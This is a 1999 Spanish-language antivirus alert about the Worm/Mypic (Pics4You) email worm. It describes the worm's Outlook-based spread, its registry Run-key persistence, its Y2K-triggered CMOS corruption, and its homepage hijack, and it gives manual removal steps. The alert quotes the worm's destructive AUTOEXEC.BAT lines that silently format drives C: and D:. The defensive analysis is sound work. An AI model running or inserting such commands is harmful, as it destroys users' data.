| |
Sábado 4 de diciembre de 1999.
Nombre: Worm/Mypic
Alias:
W32.Mypics.Worm, W32.Mypics.Worm, Pics4you, Cbios
Este virus fue detectado en la tarde del 2 de diciembre de 1999. A las pocas
horas las casas de antivirus (Symantec, Computer Associates, Norman,
Sophos y otras) tenían la alerta en sus páginas.
Este gusano se propaga a través de E-mail con un payload (rutina destructiva) muy peligrosa (en realidad dos) que se puede activar en cualquier día del año 2000. Funciona
en Windows 95/98 y NT.
Llega como un E-mail sin nada en la línea de Asunto. El mensaje lleva el archivo adjunto
"Pics4You.exe" de 34,304 bytes y el texto siguiente:
Here's some pictures for
you.
(Aquí hay algunas imágenes para usted).
Su intención claramente es engañar a quien lo recibe, haciéndolo creer que el archivo adjunto contiene imágenes.
Si el archivo Pics4You.exe es ejecutado, no mostrará ninguna imagen y simplemente parecerá haberse terminado sin hacer nada. Pero el gusano se habrá puesto residente en memoria e intentará remitir una copia de sí mismo a las primeras 50 entradas de la libreta de direcciones del Outlook. Después de veinte minutos, volverá a intentarlo, y luego después de diez minutos nuevamente intentará enviarse por correo. Este ciclo continuará siempre, una vez que el virus ha sido ejecutado.
El archivo se copiará a su PC y modificará la siguiente clave del registro para ejecutarse cada vez que Windows se reinicie:
En Windows 9x:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
= C:\Pics4You.Exe
En Windows NT:
HKLM\Software\Microsoft\WindowsNT\Windows\Run
= C:\Pics4You.Exe
Estas entradas tienen que ser borradas a mano para librarnos de MyPic después de una infección.
Como dijimos, posee dos payloads que simularán errores provocados por problemas del año 2000 (Y2K).
Pics4You.exe una vez ejecutado, se mantiene residente y supervisando el reloj del sistema. Si el año es 2000, creará un archivo llamado
C:\CBIOS.COM de solo 15 bytes de tamaño y lo ejecutará.
Este programa, escrito en Assembler, borrará el byte alto de los 2 bytes que sirven para confirmar el checksum del CMOS, invalidando esta información requerida por el setup del BIOS,
y produciéndose un mensaje de error la próxima vez que reinicie su PC
("CMOS Checksum Invalid"). Para poder bootear nuevamente, deberá ingresar al SETUP del BIOS para corregir este error en el CMOS.
El gusano también borrará el archivo AUTOEXEC.BAT (esto no funciona en Windows NT). En el próximo reinicio normal del PC, el gusano ejecutará su segundo payload, e intentará formatear las unidades C: y D:, para ello habrá creado un nuevo archivo
AUTOEXEC.BAT (de 64 bytes) con este contenido:
ctty nul
format d: /autotest /q /u
format c: /autotest /q /u
Si usted encuentra un archivo
CBIOS.COM en una de sus unidades de disco duro, deberá borrarlo a mano. Una vez activado, el virus también puede cambiar la página de inicio predefinida en su browser por la siguiente:
http://www.geocities.com/SiliconValley/Vista/8279/index.html
Esta era una página porno, que ya ha sido retirada de Geocities.
Es importante hacer notar que el virus ha sido programado en Microsoft Visual Basic. Para que el mismo pueda ejecutarse, es necesario tener instalada la librería Visual Basic Virtual Machine run-time
(MSVBVM50.DLL). Si esta librería no se encuentra en nuestro PC, el virus no funcionará.
MSVBVM50.DLL (1.3 Mb) no se propaga con el gusano, pero puede haber sido instalada por alguna otra utilidad creada en Visual Basic.
Para quitar el virus manualmente proceda de la siguiente manera:
1 - Cierre todas las aplicaciones que esté ejecutando.
2 - Pulse CTRL+ALT+SUPR y en la lista de tareas marque el proceso
MYPICS, y pinche en "Finalizar tarea".
3 - Desde Inicio, Ejecutar, escriba REGEDIT y ejecútelo. Busque la entrada:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run= C:\Pics4You.Exe
y en la ventana de la derecha, borre lo referente a
"C:\Pics4You.Exe"
En Windows NT borre lo mismo, en:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Windows\Run= C:\Pics4You.Exe
4 - En Windows 9x, asegúrese de que el archivo
AUTOEXEC.BAT no ha sido modificado (esto sólo ocurrirá si el reloj de la computadora marca el año 2000). Si tiene el contenido que se indica más arriba, bórrelo y restaure una copia original del Backup, o cree un archivo con estas líneas:
mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)
mode con codepage select=850
keyb sp,,C:\WINDOWS\COMMAND\keyboard.sys
(Esto puede variar, según la configuración de su teclado, pero el ejemplo se da para teclado en español, válido para España y América del Sur).
5 - Revise si tiene el archivo CBIOS.COM en su PC (este archivo sólo existirá si el reloj de la computadora marca el año 2000). Si lo encuentra, bórrelo.
6 - Desde Inicio, Buscar, Archivos o carpetas, busque cualquier programa llamado
"Pics4you.exe" y bórrelo.
También deberá recuperar la página de inicio en su browser, la que ha sido modificada por el gusano.
Puede hacerlo en el Internet Explorer, desde Herramientas, Opciones de Internet, en "Página de inicio".
|
